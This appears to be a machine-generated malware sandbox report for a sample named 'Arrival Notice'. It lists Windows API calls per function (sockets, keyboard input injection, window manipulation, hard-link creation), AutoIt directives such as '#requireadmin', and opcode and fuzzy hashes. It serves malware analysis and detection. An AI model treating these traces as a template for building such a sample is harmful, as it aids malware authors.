                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0044CC08,00000000,?,?,?,?), ref: 004444AA
                  • GetWindowLongW.USER32 ref: 004444C7
                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004444D7
                  Strings
                  Similarity
                  • API ID: Window$Long
                  • String ID: SysTreeView32
                  • API String ID: 847901565-1698111956
                  • Opcode ID: f06f19a5e849b9cd73362d03a628756f6c90220f83de1f2775c9857ca564dcde
                  • Instruction ID: 204ab44869b8b192dc392805f6477b852fff219d21c41bea110bf32ce8e0e194
                  • Opcode Fuzzy Hash: f06f19a5e849b9cd73362d03a628756f6c90220f83de1f2775c9857ca564dcde
                  • Instruction Fuzzy Hash: DA319E31200605ABEF219F38DC45BDB77A9EB48334F244726F975922D0D778AC509B54
                  APIs
                  • SysReAllocString.OLEAUT32(?,?), ref: 00416EED
                  • VariantCopyInd.OLEAUT32(?,?), ref: 00416F08
                  • VariantClear.OLEAUT32(?), ref: 00416F12
                  Strings
                  Similarity
                  • API ID: Variant$AllocClearCopyString
                  • String ID: *jA
                  • API String ID: 2173805711-1414719503
                  • Opcode ID: 68dc77ede5edc99018b13c89379cb3354182bd9745e25a6489f2e2e20fae9bbd
                  • Instruction ID: c7c8ceea2b023b83b5f95fb462ffd7335010a464f20d3fd6ca47b7cb95e9959b
                  • Opcode Fuzzy Hash: 68dc77ede5edc99018b13c89379cb3354182bd9745e25a6489f2e2e20fae9bbd
                  • Instruction Fuzzy Hash: 6631BE71704205DBCB05AFA4E8919FE77B9EF81304B1104AAF9064F2B1CB38D953CB99
                  APIs
                    • Part of subcall function 0043335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00433077,?,?), ref: 00433378
                  • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0043307A
                  • _wcslen.LIBCMT ref: 0043309B
                  • htons.WSOCK32(00000000,?,?,00000000), ref: 00433106
                  Strings
                  Similarity
                  • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                  • String ID: 255.255.255.255
                  • API String ID: 946324512-2422070025
                  • Opcode ID: 46e3197344bebe7d07c7ba8ec0ac73aac10025f9b04df2f74cc0dbaf150e744a
                  • Instruction ID: 7e63c2dcec8adac4048cbf1f8ba7ced947daa323b69105fab9e9f444e4238774
                  • Opcode Fuzzy Hash: 46e3197344bebe7d07c7ba8ec0ac73aac10025f9b04df2f74cc0dbaf150e744a
                  • Instruction Fuzzy Hash: E531D5396042019FCB14DF28C585EAA77F0EF18319F24909AE9158F392DB39EE41C765
                  APIs
                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00444705
                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00444713
                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0044471A
                  Strings
                  Similarity
                  • API ID: MessageSend$DestroyWindow
                  • String ID: msctls_updown32
                  • API String ID: 4014797782-2298589950
                  • Opcode ID: adde3fe6283e69f9fa645813519abaab3a64143c26a59bf3a0d703be3a4a0fa1
                  • Instruction ID: 606460b4299fe8305b500e6c37073f77089ea810f4634d19af0902805debb2f4
                  • Opcode Fuzzy Hash: adde3fe6283e69f9fa645813519abaab3a64143c26a59bf3a0d703be3a4a0fa1
                  • Instruction Fuzzy Hash: 112162B5600209AFEB11DF64DCC1DBB37ADEB9A354B05045AFA049B361CB34EC12CB64
                  APIs
                  Strings
                  Similarity
                  • API ID: _wcslen
                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                  • API String ID: 176396367-2734436370
                  • Opcode ID: 5fa659b4986d113014a6eadab17326061ce2b4ad53d2c424823ee8358e6f7e55
                  • Instruction ID: 3d09f67b126d10d8f6808738ab9a5cbfc02ebd935057af18f7633f532268b2e0
                  • Opcode Fuzzy Hash: 5fa659b4986d113014a6eadab17326061ce2b4ad53d2c424823ee8358e6f7e55
                  • Instruction Fuzzy Hash: 27215B3310411066E332AB249C22FF773D9EFA1300F144027FA49AB241EB69ADD6C2AD
                  APIs
                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00443840
                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00443850
                  • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00443876
                  Strings
                  Similarity
                  • API ID: MessageSend$MoveWindow
                  • String ID: Listbox
                  • API String ID: 3315199576-2633736733
                  • Opcode ID: 0bceb94b6557fdc4bc523be4476b696afa07fd46a89b40282fcd210dbe4ef933
                  • Instruction ID: f66532581a8507761d37d70d1596aafaca9ec17b41ca29802dba1b9e3a64ce34
                  • Opcode Fuzzy Hash: 0bceb94b6557fdc4bc523be4476b696afa07fd46a89b40282fcd210dbe4ef933
                  • Instruction Fuzzy Hash: 5221D472600118BBFF119F55CC81FBB77AEEF89B54F108126F9449B290C675DC5287A4
                  APIs
                  • SetErrorMode.KERNEL32(00000001), ref: 00424A08
                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00424A5C
                  • SetErrorMode.KERNEL32(00000000,?,?,0044CC08), ref: 00424AD0
                  Strings
                  Similarity
                  • API ID: ErrorMode$InformationVolume
                  • String ID: %lu
                  • API String ID: 2507767853-685833217
                  • Opcode ID: fd897fb20deab23e69b3af58ce1969e05dfca8d47d663adecbf930358f39fd52
                  • Instruction ID: b39a61bee2fabce8e4ff5b646d69aa84da20d51e106d05d81938a5ae9c9e7f47
                  • Opcode Fuzzy Hash: fd897fb20deab23e69b3af58ce1969e05dfca8d47d663adecbf930358f39fd52
                  • Instruction Fuzzy Hash: 71318E74A00108AFDB11DF54C881EAA7BF8EF49308F1480AAE909DF252D775ED45CB65
                  APIs
                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0044424F
                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00444264
                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00444271
                  Strings
                  Similarity
                  • API ID: MessageSend
                  • String ID: msctls_trackbar32
                  • API String ID: 3850602802-1010561917
                  • Opcode ID: 82ea4a27812f916313de2a707c05e52d1297761c7c76226253cdd04dc6e969ef
                  • Instruction ID: 206b4fdcf2d039c43d8def9758d607189ed1cdae50fcdddee9b00cb886b2b599
                  • Opcode Fuzzy Hash: 82ea4a27812f916313de2a707c05e52d1297761c7c76226253cdd04dc6e969ef
                  • Instruction Fuzzy Hash: E4110A312402087EFF205F25CC06FAB3BACEFD5764F110525FA55E6190D6B5DC119714
                  APIs
                    • Part of subcall function 003B6B57: _wcslen.LIBCMT ref: 003B6B6A
                    • Part of subcall function 00412DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00412DC5
                    • Part of subcall function 00412DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00412DD6
                    • Part of subcall function 00412DA7: GetCurrentThreadId.KERNEL32 ref: 00412DDD
                    • Part of subcall function 00412DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00412DE4
                  • GetFocus.USER32 ref: 00412F78
                    • Part of subcall function 00412DEE: GetParent.USER32(00000000), ref: 00412DF9
                  • GetClassNameW.USER32(?,?,00000100), ref: 00412FC3
                  • EnumChildWindows.USER32(?,0041303B), ref: 00412FEB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                  • String ID: %s%d
                  • API String ID: 1272988791-1110647743
                  • Opcode ID: 466423c643011cd8c9c81d0a6467e954477ae863046dae1f5f631a08951452e6
                  • Instruction ID: eb8491a2cbc133151f8a1f9dfb5cb4635c2c77b0f913c08b00dd6e82ac35793a
                  • Opcode Fuzzy Hash: 466423c643011cd8c9c81d0a6467e954477ae863046dae1f5f631a08951452e6
                  • Instruction Fuzzy Hash: A71105712002046BCF45BF61DCD6FEE37AAAF84308F04807AB909DB242DE7899858B74
                  APIs
                  • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 004458C1
                  • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 004458EE
                  • DrawMenuBar.USER32(?), ref: 004458FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Menu$InfoItem$Draw
                  • String ID: 0
                  • API String ID: 3227129158-4108050209
                  • Opcode ID: c81cb535981f1232d7fa9222255c34ea73aa7bc8a85cf39a314627b7e1767e5d
                  • Instruction ID: 25da78cc143c308332899e1143bf15a30f2e3352f222ba237107f0fcc56e9a4c
                  • Opcode Fuzzy Hash: c81cb535981f1232d7fa9222255c34ea73aa7bc8a85cf39a314627b7e1767e5d
                  • Instruction Fuzzy Hash: FA01A171500218EFEF119F21DC44BAFBBB5FB45760F0480AAE849DA252DB348A80DF25
                  APIs
                  • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0040D3BF
                  • FreeLibrary.KERNEL32 ref: 0040D3E5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: AddressFreeLibraryProc
                  • String ID: GetSystemWow64DirectoryW$X64
                  • API String ID: 3013587201-2590602151
                  • Opcode ID: 777b6a2b9d06d5be0bbb9cb09b322d8eb06c51a507393b0a7928d130c2d44976
                  • Instruction ID: c1ca791d7dfd7e91c5e2f731dc7049e6617ebb5e81f80b102e991389ea365894
                  • Opcode Fuzzy Hash: 777b6a2b9d06d5be0bbb9cb09b322d8eb06c51a507393b0a7928d130c2d44976
                  • Instruction Fuzzy Hash: 3CF0A765C06921DBD7B116504C94A5A7314AF11701B5895BFBC02F128CD73CCD498B9F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4a29ff5fe1996b8088ccc027e7aead05a76282bd104343e363c9c59be8dd9a4d
                  • Instruction ID: 8fc5ea3cad2808170fe8f543b17610b3d538d7be0edad0fdeef7494f6f822d8c
                  • Opcode Fuzzy Hash: 4a29ff5fe1996b8088ccc027e7aead05a76282bd104343e363c9c59be8dd9a4d
                  • Instruction Fuzzy Hash: 1DC16C75A0020AEFCB14CFA4C894AAEB7B5FF48304F10859AE915EB251D775EDC2CB94
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Variant$ClearInitInitializeUninitialize
                  • String ID:
                  • API String ID: 1998397398-0
                  • Opcode ID: e526cb0e4c9bf710a7ef4ebf3db40fa465c00af9b5e2b246e46d7305230c427c
                  • Instruction ID: 4b657d24b47ef71b9dc5b3d675f06c4c89db5541ce42070f90344a323f86ce4f
                  • Opcode Fuzzy Hash: e526cb0e4c9bf710a7ef4ebf3db40fa465c00af9b5e2b246e46d7305230c427c
                  • Instruction Fuzzy Hash: 89A159756042009FC711DF28C486A6AB7E5FF8D715F04885EF98A9B362DB34EE01CB96
                  APIs
                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0044FC08,?), ref: 004105F0
                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0044FC08,?), ref: 00410608
                  • CLSIDFromProgID.OLE32(?,?,00000000,0044CC40,000000FF,?,00000000,00000800,00000000,?,0044FC08,?), ref: 0041062D
                  • _memcmp.LIBVCRUNTIME ref: 0041064E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: FromProg$FreeTask_memcmp
                  • String ID:
                  • API String ID: 314563124-0
                  • Opcode ID: 38e44709570edb3e08d754ed3ff45285680f41772339dd6f4422d6ee790875c8
                  • Instruction ID: 000b4591189958765709d0de4c2b7162bc5c610a22a608a0bd8188013efbfbec
                  • Opcode Fuzzy Hash: 38e44709570edb3e08d754ed3ff45285680f41772339dd6f4422d6ee790875c8
                  • Instruction Fuzzy Hash: 65814A71A00109EFCB04DF94C984EEEB7BAFF89315F204159E506AB250DB75AE86CB64
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _free
                  • String ID:
                  • API String ID: 269201875-0
                  • Opcode ID: e47b17d5ccb8933cdc23ca39e890da25d95de3a73464c5457e113f18c4cf713e
                  • Instruction ID: 459533f12abca5ede35a76733f4c5ddd0cd71e1eb02ef00f1828da78fe179dc0
                  • Opcode Fuzzy Hash: e47b17d5ccb8933cdc23ca39e890da25d95de3a73464c5457e113f18c4cf713e
                  • Instruction Fuzzy Hash: B041413650011CEBDB236BBBBC45BBE3AB8EF81330F150626F619DA2D1D67448415771
                  APIs
                  • GetWindowRect.USER32(010EEA28,?), ref: 004462E2
                  • ScreenToClient.USER32(?,?), ref: 00446315
                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00446382
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$ClientMoveRectScreen
                  • String ID:
                  • API String ID: 3880355969-0
                  • Opcode ID: aa1ef24e7aa585d1ccb97411092081d7c49eced53798cbf4b7d9fd3d588ae0c6
                  • Instruction ID: 4ff0b8de0cbef4d69541a0b0edf1378162d01bbe6060deb65784b3dfeb54b56d
                  • Opcode Fuzzy Hash: aa1ef24e7aa585d1ccb97411092081d7c49eced53798cbf4b7d9fd3d588ae0c6
                  • Instruction Fuzzy Hash: 49515A74A00249AFEF10DF68D8809AE7BB5FB46364F11826AF8159B3A0D734ED81CB55
                  APIs
                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00431AFD
                  • WSAGetLastError.WSOCK32 ref: 00431B0B
                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00431B8A
                  • WSAGetLastError.WSOCK32 ref: 00431B94
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorLast$socket
                  • String ID:
                  • API String ID: 1881357543-0
                  • Opcode ID: cd969aea1c85c4a4ee875a2cd680b4095ea242a1eccabde9a3103107d660df92
                  • Instruction ID: 3744ec2746c23bdc123494ecf71c42f7dd435e9345c32e59790757a10cd3ce1c
                  • Opcode Fuzzy Hash: cd969aea1c85c4a4ee875a2cd680b4095ea242a1eccabde9a3103107d660df92
                  • Instruction Fuzzy Hash: 2041D434600200AFE725AF20C886F6A77E5AB48718F54845DF61A9F7D3D776ED418B90
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 765077d3fb46ddee2a427f6bf7fd15d2d397306a410e524a39c743f3784c373a
                  • Instruction ID: 5d386bcaa7dd4b4896c6ba742aef76bc937dba3ce81c8825fa9db66f742c3957
                  • Opcode Fuzzy Hash: 765077d3fb46ddee2a427f6bf7fd15d2d397306a410e524a39c743f3784c373a
                  • Instruction Fuzzy Hash: 7641F8B5A00358AFD7279F7ACC41B6BBBA9EB84710F10462EF541DF6C2D77199018B80
                  APIs
                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00425783
                  • GetLastError.KERNEL32(?,00000000), ref: 004257A9
                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 004257CE
                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 004257FA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CreateHardLink$DeleteErrorFileLast
                  • String ID:
                  • API String ID: 3321077145-0
                  • Opcode ID: 9376d44fb3b76ba4ebeff74efd5892877025e0f48af77eec8d48c4630a986d8f
                  • Instruction ID: 74a07308417a4dc2bb97afd1217bd38549c094da749694917c0cb2c7b63ff3f9
                  • Opcode Fuzzy Hash: 9376d44fb3b76ba4ebeff74efd5892877025e0f48af77eec8d48c4630a986d8f
                  • Instruction Fuzzy Hash: FF413C39700610DFCB21EF15C445A5ABBE2EF89724B188489E94A5F762CB74FD00CB95
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000000,?,003D6D71,00000000,00000000,003D82D9,?,003D82D9,?,00000001,003D6D71,?,00000001,003D82D9,003D82D9), ref: 003ED910
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003ED999
                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 003ED9AB
                  • __freea.LIBCMT ref: 003ED9B4
                    • Part of subcall function 003E3820: RtlAllocateHeap.NTDLL(00000000,?,00481444,?,003CFDF5,?,?,003BA976,00000010,00481440,003B13FC,?,003B13C6,?,003B1129), ref: 003E3852
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                  • String ID:
                  • API String ID: 2652629310-0
                  • Opcode ID: 718964d3456d3374b6eff855c06af928fdc60d689c73275452884733d5afcdd7
                  • Instruction ID: 957ac35ca8f28f6ebb5a31a8a659755421606e2a6d8493c513ac1d50e5e318f6
                  • Opcode Fuzzy Hash: 718964d3456d3374b6eff855c06af928fdc60d689c73275452884733d5afcdd7
                  • Instruction Fuzzy Hash: CB31E572A0025AABDF26CF66DC85EAF7BA5EB41310F050269FC04DB291E735CD50CB90
                  APIs
                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00445352
                  • GetWindowLongW.USER32(?,000000F0), ref: 00445375
                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00445382
                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004453A8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: LongWindow$InvalidateMessageRectSend
                  • String ID:
                  • API String ID: 3340791633-0
                  • Opcode ID: 489a9e435cf05a3071d80ec5624111dc4ce9235d9b3256318c5251250177f319
                  • Instruction ID: 7823dc9439aa6e71ffc64a971b8f966bba3197ad2a03d81e81f4bae875a9a257
                  • Opcode Fuzzy Hash: 489a9e435cf05a3071d80ec5624111dc4ce9235d9b3256318c5251250177f319
                  • Instruction Fuzzy Hash: 1E310234A55A08EFFF309F14CC46BEA77A5AB05390F584013FE10862E2C7B89D41DB4A
                  APIs
                  • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0041ABF1
                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 0041AC0D
                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 0041AC74
                  • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0041ACC6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: KeyboardState$InputMessagePostSend
                  • String ID:
                  • API String ID: 432972143-0
                  • Opcode ID: 023765e81f10c9b20af97ce2061efd14d22360b16a2f5c4132da76ce891ff941
                  • Instruction ID: 80432d03f76305ddd9fd2d358223994ada903a28b93746230a3d589bef4bbf7c
                  • Opcode Fuzzy Hash: 023765e81f10c9b20af97ce2061efd14d22360b16a2f5c4132da76ce891ff941
                  • Instruction Fuzzy Hash: F431F630A417186FEB35CB65C8087FB7BA5AB85310F08421BE485922D5E37D89E587DA
                  APIs
                  • ClientToScreen.USER32(?,?), ref: 0044769A
                  • GetWindowRect.USER32(?,?), ref: 00447710
                  • PtInRect.USER32(?,?,00448B89), ref: 00447720
                  • MessageBeep.USER32(00000000), ref: 0044778C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
